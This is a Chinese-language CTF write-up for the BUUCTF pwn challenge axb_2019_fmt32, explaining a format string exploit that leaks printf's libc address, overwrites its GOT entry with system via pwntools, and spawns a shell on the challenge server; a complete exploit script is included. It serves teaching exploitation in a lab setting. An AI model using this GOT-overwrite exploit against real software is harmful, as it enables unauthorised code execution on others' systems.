axb_2019_fmt32

附件

步骤:

  1. 例行检查,32位程序,开启了nx保护
  2. 本地试运行一下程序,看看大概的情况
  3. 32位ida载入

    alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程
    25行,明显的格式化字符串漏洞

这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址

s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据

利用过程:

  1. 首先找一下我们输入的参数在栈上的相对位置,如图,补了一个字母‘B’之后偏移为8
    找到偏移量后可以来泄露libc版本了
payload = 'A' + p32(printf_got)+ 'B' + '%8$s'

#‘A’  是用来补位的,这样后面的printf函数的got表地址就会在栈上相对距离为8的位置

#‘B’  相当于标记位,下面在接收数据的时候,接收到字符‘B’,后面跟着的就是我们泄露出来的函数地址

#%8$s  利用格式化字符串漏洞的%8$s去泄露出栈上相对距离为8的地址上的值

关于格式化字符串漏洞的原理,利用,格式化字符,看该文章

2. 在得到libc基址后,就可以算出程序里的system函数地址了

payload = 'A' + p32(printf_got)+ 'B' + '%8$s'

r.sendafter("Please tell me:",payload)

r.recvuntil('B')

printf_addr = u32(sh.recv(4))

print(hex(printf_addr))

libc = LibcSearcher('printf', printf_addr)

libcbase = printf_addr - libc.dump('printf')

system_addr = libcbase + libc.dump('system')
  1. 我们接下来要做的就是把利用fmtstr_payload,将printf的地址改为了system的地址,这边用的pwntools的工具,我简单解释一下,关于工具的具体情况,看这篇文章
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)

第一个参数表示格式化字符串的偏移

第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress};

第三个参数表示已经输出的字符个数

第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写


payload='a'+fmtstr_payload(8,{printf_got:system},write_size = "byte",numbwritten = 0xa)

0xa=1(payload前面的a)+9(repeater:的长度)
之后传入 ‘/bin/sh’ 即可以获取shell

完整exp

from pwn import *

from LibcSearcher import *

context(os='linux',arch='i386',log_level='debug')

#r = process("./axb_2019_fmt32")

r = remote("node3.buuoj.cn","27499")

elf=ELF("./axb_2019_fmt32")

printf_got = elf.got['printf']

payload = 'a' + p32(printf_got) +'22'+ '%8$s'

r.sendafter('me:', payload)

r.recvuntil("22")

printf_addr = u32(r.recv(4))

print "printf_addr"+hex(printf_addr)

libc=LibcSearcher('printf',printf_addr)

libc_base=printf_addr-libc.dump('printf')

system=libc_base+libc.dump('system')

print "system_addr"+hex(system)

payload='a'+fmtstr_payload(8,{printf_got:system},write_size = "byte",numbwritten = 0xa)

#p.recvuntil(':')

r.sendline(payload)

r.sendline(';/bin/sh\x00')

r.interactive()

libc选13

参考wp:https://www.yuque.com/u239977/cbzkn3/nu76pp

百度过程中发现原题是道盲打,贴一下盲打的链接,本人太菜,没太搞明白
https://www.anquanke.com/post/id/196722#h3-4

[BUUCTF]PWN——axb_2019_fmt32的更多相关文章

  1. [BUUCTF]PWN——babyheap_0ctf_2017

    [BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...

  2. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. buuctf --pwn part2

    pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...

  6. buuctf pwn wp---part1

    pwn难啊 1.test_your_nc 测试你nc,不用说,连上就有. 2.rip ida中已经包含了system函数: 溢出,覆盖rip为fun函数,peda计算偏移为23: from pwn i ...

  7. [BUUCTF]PWN——pwnable_hacknote

    pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方 ...

  8. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  9. [BUUCTF]PWN——mrctf2020_easyoverflow

    mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shel ...

随机推荐

  1. [hdu6997]愿望幽灵

    约定:$[x^{n}]F(x)$​​​​​​表示多项式$F$​​​​​​的$n$​​​​​​次项系数 对于多项式$F$​​​​​​,定义$F$​​​​​的复合逆$\hat{F}$​​​​​为满足$F( ...

  2. [atARC112F]Die Siedler

    1和2操作是独立的,换言之一定可以先执行1操作选择包裹,再执行2操作使得$0\le c_{i}<2i$ 对于$c_{i}$,将其看作一个进制转换,并以$c_{i}$为从低到高的第$i$位,系数即 ...

  3. [loj3342]制作菜品

    当$n-1\le m$,不妨令$d_{1}\le d_{2}\le...\le d_{n}$,则$(n-1)k\le mk=\sum_{i=1}^{n}d_{i}\le d_{1}+(n-1)d_{n ...

  4. Pickle的简单用法

    Python中pickle的用法 pickle存在的意义 在python的文件操作里面,我们常常需要将python容器里面的一些东西把它写成一个二进制文件存放在硬盘里面来永久保存. 在不借助pickl ...

  5. Servlet jsp maven 依赖包

    servlet<dependency> <groupId>javax.servlet</groupId> <artifactId>javax.servl ...

  6. CF1554E You

    考虑到删点操作的实质是指认边的方向. 由于这是一棵树,所以有很好的性质. 我们完全可以以此从树叶开始,往上拓扑进行,按照对某个数的取膜的大小来进行操作. 由此可知,除了 \(1\) 以外,任意 \(2 ...

  7. Codeforces 590E - Birthday(AC 自动机+Dilworth 定理+二分图匹配)

    题面传送门 AC 自动机有时只是辅助建图的工具,真的 首先看到多串问题,果断建出 AC 自动机.设 \(m=\sum|s_i|\). 不难发现子串的包含关系构成了一个偏序集,于是我们考虑转化为图论,若 ...

  8. Codeforces 1010F - Tree(分治 NTT+树剖)

    Codeforces 题面传送门 & 洛谷题面传送门 神仙题. 首先我们考虑按照这题的套路,记 \(t_i\) 表示 \(i\) 上的果子数量减去其儿子果子数量之和,那么对于一个合法的放置果子 ...

  9. 5分钟6步强制删除kubernetes NameSpace小技巧

    在使用kubernetes过程中,我们经常会遇到无法删除NameSpace的情况,但是如果一一去删除NameSpace中资源比较麻烦.下面我们给大家介绍强制删除NameSpace的方法. 一.查看已存 ...

  10. 大数据学习day14-----第三阶段-----scala02------1. 元组 2.类、对象、继承、特质 3.函数(必须掌握)

    1. 元组 映射是K/V对偶的集合,对偶是元组的最简单的形式,元组可以装着多个不同类型的值 1.1 特点 元组相当于一个特殊的数组,其长度和内容都可变,并且数组中可以装任何类型的数据,其主要用处就是存 ...